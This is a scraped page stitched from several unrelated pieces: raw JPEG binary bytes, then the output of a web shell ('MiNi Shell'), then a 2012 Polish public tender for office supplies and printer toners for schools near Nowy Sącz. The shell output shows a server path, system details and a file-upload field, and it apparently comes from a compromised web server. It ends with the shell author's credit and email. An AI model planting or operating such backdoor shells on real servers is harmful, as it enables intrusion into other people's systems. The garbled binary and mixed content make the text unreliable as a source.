JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120830/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120830/187309-N-2012.html

<p class="kh_header"><b>Nowy Sącz: PCFE.272.44.2012 Dostawa materiałów biurowych, tonerów i tuszów na potrzeby projektu pn. Aktywnie w przyszłość</b><br>
<b>Numer ogłoszenia: 187309 - 2012; data zamieszczenia: 30.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Funduszy Europejskich , ul. Barbackiego 89, 33-300 Nowy Sącz, woj. małopolskie, tel. 18 547 67 36, faks 18 547 67 36.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcfe.powiat-ns.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PCFE.272.44.2012 Dostawa materiałów biurowych, tonerów i tuszów na potrzeby projektu pn. Aktywnie w przyszłość.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest dostawa materiałów biurowych, tonerów i tuszów na potrzeby projektu pn. Aktywnie w przyszłość, współfinansowanego przez Unię Europejską z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
2) Przedmiot zamówienia obejmuje:
I. Zespół Szkół Podstawowo - Gimnazjalnych im. Jana Pawła II w Łososinie Dolnej:
1. Papier ksero 31 ryz 
2. Długopisy 20 sztuk 
3. Toner do kserokopiarki MITA 1635  1 sztuka
II. Zespół Szkół w Paszynie:	 	 
1. Papier ksero 12 ryz
2. Koszulki na dokumenty 2 opakowania
3. Teczki kartonowe		1 opakowanie
4. Skoroszyt plastikowy		1 opakowanie
5. Folia do laminowania	1 opakowanie	
6. Toner do drukarki Lexmark E260d 		1 sztuka
III. Zespół Szkół Podstawowo - Gimnazjalnych w Królowej Górnej:	 
1. Papier ksero	15 ryz
2. Segregatory		10 sztuk
3. Koszulki na dokumenty 2 sztui
4. Skoroszyt plastikowy	1 sztuka
5. Tusze do drukarki HP Desk Jet 845c	1 	zestaw
IV. Zespół Szkolno - Gimnazjalny w Łącku:	 	 
1.	Taśma klejąca		5 sztuk
2.	Papier ksero 		51 ryz
3.	Papier ksero		1 ryza
4.	Papier kancelaryjny	1 	opakowanie
5.	Koszulki na dokumenty		2 opakowania
6.	Długopisy		20 sztuk
7.	Teczki kartonowe		1 opakowanie
8.	Skoroszyt		1 opakowanie
9.	Koperty A4		1 opakowanie
10.	Koperty A5		1 opakowanie
11.	Korektor na taśmie		3 sztuki
12.	Klej w sztyfcie		3 sztuki
13.	Spinacze biurowe		5 opakowań
14.	Zszywki biurowe	5 opakowań
15. Ołówek		10 sztuk
16. Karteczki samoprzylepne		4 opakowania
17. Zszywacz		1 sztuka
18. Toner do Kyocera KM-1620		1 sztuka
V. Zespół Szkolno-Gimnazjalny w Zagorzynie:	 	 
1.	Papier ksero 		13 ryz
2.	Długopisy		20 sztuk
3.	Segregatory 	10 sztuk	
4.	Zakreślacze		2 opakowania
5.	Teczki kartonowe		1 opakowanie
6.	Koszulki na dokumenty		2 opakowania
7.	Taśma klejąca		5 sztuk
8.	Zszywki biurowe		2 opakowania
9.	Korektor w taśmie 	3 	sztuk
10.	Skoroszyt plastikowy		1 opakowanie
11.	Koperty A4		1 opakowanie
12.	Karteczki samoprzylepne		4 opakowania
13.	Toner do HP Laser Jet 1020 		1 sztuka
VI. Zespół Szkół w Marcinkowicach:	 	 
1.	Papier ksero	11 	ryz
2.	Długopisy	20 	sztuk
3.	Koszulki na dokumenty		2 opakowania
4.	Karteczki samoprzylepne		4 opakowania
5.	Teczki kartonowe		1 opakowanie
6.	Toner do HP LaserJet 1020		1 sztuka
VII. Gimnazjum im. ks. Józefa Woźniackiego w Rytrze:	 	 
1. Papier ksero 18 ryz
2.	Koszulki na dokumenty		2 opakowań
3.	Teczki kartonowe		1 opakowanie
4.	Skoroszyt plastikowy	1 opakowanie	
5.	Segregatory	10 sztuk
6.	Toner do drukarki HP LaserJetP1102w	1 sztuka	
VIII. Zespół Szkół w Świniarsku:	 	 
1.	Papier ksero		15 ryz
2.	Toner do RICOH Aficio MP 3010 	1 sztuka	
IX. Zespół Szkół Podstawowo - Gimnazjalnych im. ks. prof. Piotra Poręby w Mystkowie:
1.	Papier ksero		6 ryz
2.	Pinezki		5 opakowań
3.	Teczki kartonowe	1 	opakowanie
4.	Skoroszyt plastikowy		1 opakowanie
5.	Koszulki na dokumenty	 	2 opakowanie
6.	Toner do Triumph Adler DC2130 (urządzenie na gwarancji)		1 sztuka
X. Gimnazjum w Tęgoborzu:	 	 
1.	Papier ksero	28 	ryz
2.	Koszulki na dokumenty		2 opakowania
3.	Skoroszyt		1 opakowanie
4.	Karteczki samoprzylepne		4 opakowania
5.	Toner do Samsung ML 2580N		1 sztuka
XI. Zespół Szkół w Chomranicach:	 	 
1.	Papier ksero		17 ryz
2.	Teczka kartonowe		1 opakowanie
3.	Segregatory 10 	sztuk
4.	Segregatory 		10 sztuk
5.	Koszulki na dokumenty		2 opakowań
6.	Długopisy		20 sztuk
7.	Toner do drukarki Samsung ML-2580 N (drukarka na gwarancji)		1 sztuka
XII.	Zespół Szkół w Wielogłowach:	 	 
1.	Spinacze biurowe 		5 opakowań
2.	Pinezki		5 opakowań
3.	Karteczki samoprzylepne 		4 opakowań
4.	Papier ksero 		21 ryz
5.	Skoroszyt plastikowy	1 opakowanie	
6.	Koszulki na dokumenty		2 opakowań
7.	Teczki kartonowe		1 opakowanie
8.	Toner do Kserokopiarki Panasonic DP 8016P	1 sztuka	
XIII.	Publiczne Gimnazjum w Nawojowej:	  	 
1.	Koperty C6, A4, A5		1 komplet
2.	Skoroszyt		1 opakowanie
3.	Skoroszyt plastikowy		1 opakowanie
4.	Koszulki na dokumenty	2 opakowania
5.	Szpilki		5 opakowania
6.	Taśma klejąca 	5 	sztuk
7.	Długopisy		20 sztuk
8.	Ołówki		5 sztuk
9.	Spinacze biurowe		5 opakowań
10.	Papier ksero		47 ryza
11.	Nożyczki		1 sztuka
12.	Toner do HP Laser Jet M1212nf MFP (urządzenie na gwarancji)	1 sztuka	
XIV.Zespół Szkół w Trzetrzewinie:	 	 
1.	Papier ksero		12 ryz
2.	Koszulki na dokumenty		2 opakowania
3.	Spinacze  biurowe		5 opakowań
4.	Teczki kartonowe		1 opakowanie
5.	Toner do HP Laser Jet 1018		1 sztuka
6.	Zszywki biurowe 	5 	opakowań
7.	Markery czarne	5 	sztuk
8.	Zakreślacze		2 opakowania
9.	Długopisy		20 sztuka
XV.Zespół Szkół w Piątkowej:	 	 
1.	Toner do Canon IR 2018		1 sztuka
2.	Papier ksero 		13 ryz
XVI. Publiczne Gimnazjum w Tyliczu:	 	 
1.	Toner do RICOH Aficio 2022		1 sztuka
2.	Skoroszyt	1 opakowanie	
3.	Teczki kartonowe		1 opakowanie
4.	Segregatory 		10 sztuk
5.	Przekładki do segregatorów		1 opakowanie
6.	Koszulki na dokumenty		2 opakowania
7.	Zszywacz		1 sztuka
8.	Karteczki samoprzylepne		4 opakowania
9.	Długopisy	20 	sztuk
10.	Zakreślacze		2 opakowania
11.	Cienkopisy kolorowe	1 opakowanie	
12.	Markery do opisywania przedmiotów 		1 komplet
13.	Koperty A4		1 opakowanie
14.	Klipsy biurowe		3 opakowania
15.	Papier ksero 15 	ryz	
XVII. Gimnazjum Publiczne w Kamionce Wielkiej:	 	 
1.	Toner do Kyocera KM 1620 1 	sztuka	
2.	Papier ksero		21 ryz
3.	Długopisy		20 sztuk
4.	Segregatory	10 sztuk
XVIII.	Samorządowe Centrum Edukacji Szkolnej w Bereście:	 
1.	Toner do SAMSUNG ML-2010P	1 	sztuka
2.	Papier ksero 13 ryz
XIX.	Zespół Szkół w Chełmcu:	 	 
1.	Toner do LEXMARK E260		1 sztuka
2.	Segregatory		10 sztuk
3.	Segregatory		10 sztuk
4.	Karteczki samoprzylepne		4 opakowania
5.	Skoroszyt plastikowy		1 opakowanie
6.	Skoroszyt		1 opakowanie
7.	Teczki kartonowe	1 	opakowanie
8.	Koszulki na dokumenty		2 opakowania
9.	Zakreślacze		2 opakowania
10.	Długopisy żelowe		20 sztuk
11.	Ołówki		10 sztuk
12.	Korektor w taśmie 		3 sztuki
13.	Korektor	3 	sztuki
14.	Papier ksero		43 ryzy
XX.	Zespół Szkół w Librantowej:	 	 
1.	Toner do Lexmark E260d		1 sztuka
2.	Papier ksero		9 ryz
3.	Papier ksero		1 ryza
4.	Teczki kartonowe		1 opakowanie
5.	Korektor	3 sztuki,
6.	Taśma klejąca		5 sztuk
7.	Segregatory 20 	sztuk
8.	Koszulki na dokumenty		4 opakowania
9.	Karteczki samoprzylepne		4 opakowania
10.	Zszywacz		1 sztuka
11.	Zakreślacze		2 opakowania
12.	Szpilki		5 opakowań
13.	Pinezki		5 opakowań
14.	Zszywki biurowe		5 opakowań
XXI.	Zespół Szkolno-Gimnazjalny w Jazowsku:	 	 
1.	Toner do Samsung - ML-1520	1 sztuka	
2.	Koszulki na dokumenty		2 opakowania
3.	Teczki kartonowe		1 opakowanie
4.	Skoroszyt plastikowy		1 opakowanie
5.	Zakreślacze		2 opakowania
6.	Długopisy		20 sztuk
7.	Ołówki	10 sztuk
8.	Markery czarne		5 sztuk
9.	Karteczki samoprzylepne		4 opakowania
10.	Taśma klejąca		5 sztuk
11.	Spinacze biurowe		5 opakowań
12.	Pinezki		5 opakowań
13.	Zszywacz		1 sztuka
14.	Zszywki biurowe		5 opakowań
15.	Segregatory		10 sztuk
16.	Tusz do pieczątek		1 sztuka
17.	Papier ksero		27 ryz
XXII.	Biuro Projektu:
1.	Papier ksero	90 	ryz
3) Miejsce realizacji dostawy: siedziba Zamawiającego. Dostawa zostanie zrealizowana jednorazowo w dniu roboczym od poniedziałku do piątku w godzinach od 8.00 do 14.00.
4)	Wykonawca jest zobowiązany poinformować Zamawiającego o planowanym terminie dostawy na 2 dni przed tym terminem.
5)	Do obowiązków Wykonawcy należy również transport, załadunek, rozładunek oraz wniesienie do pomieszczeń wskazanych przez przedstawicieli Zamawiającego.
6)	Wykonawca jest zobowiązany do posortowania dostawy wg szkół. Materiały biurowe przeznaczone dla danej szkoły winny być oddzielnie zapakowane, a opakowanie/a winno zostać jednoznacznie i czytelnie opisane.
7) Szczegółowy opis przedmiotu zamówienia w specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.12.51.10-5, 30.19.76.42-8, 30.19.76.20-8, 30.19.29.00-0, 30.19.72.20-4, 30.19.73.20-5, 30.19.92.30-1, 31.19.21.30-3, 30.19.21.21-5, 30.19.95.00-5, 22.85.10.00-0, 30.19.25.00-6, 30.19.71.00-7, 22.81.63.00-6, 39.24.12.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Z uwagi na wartość przedmiotu zamówienia Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się
Wykonawcy, którzy spełniają warunki dotyczące posiadania uprawnień do wykonywania określonej
działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Zamawiający na
potwierdzenie spełniania tego warunku udziału w postępowaniu wymaga złożenia oświadczenia w trybie
art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi załącznik nr 2 do
specyfikacji istotnych warunków zamówienia). Zamawiający dokona oceny spełniania warunków zgodnie
z formułą: spełnia - nie spełnia, na podstawie informacji zawartych w dostarczonych dokumentach i
oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się
Wykonawcy, którzy spełniają warunki dotyczące posiadania wiedzy i doświadczenia. Zamawiający na
potwierdzenie spełniania tego warunku udziału w postępowaniu wymaga złożenia oświadczenia w trybie
art. 22 ust. 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 2 do
specyfikacji istotnych warunków zamówienia). Zamawiający dokona oceny spełniania warunków zgodnie
z formułą: spełnia - nie spełnia, na podstawie informacji zawartych w dostarczonych dokumentach i
oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się
Wykonawcy, którzy spełniają warunki dotyczące dysponowania odpowiednim potencjałem technicznym.
Zamawiający na potwierdzenie spełniania tego warunku udziału w postępowaniu wymaga złożenia
oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi
załącznik nr 2 do specyfikacji istotnych warunków zamówienia). Zamawiający dokona oceny spełniania
warunków zgodnie z formułą: spełnia - nie spełnia, na podstawie informacji zawartych w dostarczonych
dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się
Wykonawcy, którzy spełniają warunki dotyczące dysponowania osobami zdolnymi do wykonania
zamówienia. Zamawiający na potwierdzenie spełniania tego warunku udziału w postępowaniu wymaga
złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych (oświadczenie to
stanowi załącznik nr 2 do specyfikacji istotnych warunków zamówienia). Zamawiający dokona oceny
spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w
dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się
Wykonawcy, którzy spełniają warunki dotyczące sytuacji ekonomicznej i finansowej. Zamawiający na
potwierdzenie spełniania tego warunku udziału w postępowaniu wymaga złożenia oświadczenia w trybie
art. 22 ust. 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 2 do
specyfikacji istotnych warunków zamówienia). Zamawiający dokona oceny spełniania warunków zgodnie
z formułą: spełnia - nie spełnia, na podstawie informacji zawartych w dostarczonych dokumentach i
oświadczeniach wymaganych w specyfikacji</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pcfe.powiat-ns.pl/index.php?id=61<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Funduszy Europejskich, 33-300 Nowy Sącz, ul. Barbackiego 89, Grzegorz Poręba, pokój nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.09.2012 godzina 12:00, miejsce: Powiatowe Centrum Funduszy Europejskich, 33-300 Nowy Sącz, ul. Barbackiego 89, Dziennik Podawczy..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Aktywnie w przyszłość, współfinansowany przez Unię Europejską ze środków
Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX. Rozwój
wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej
jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans
edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług
edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com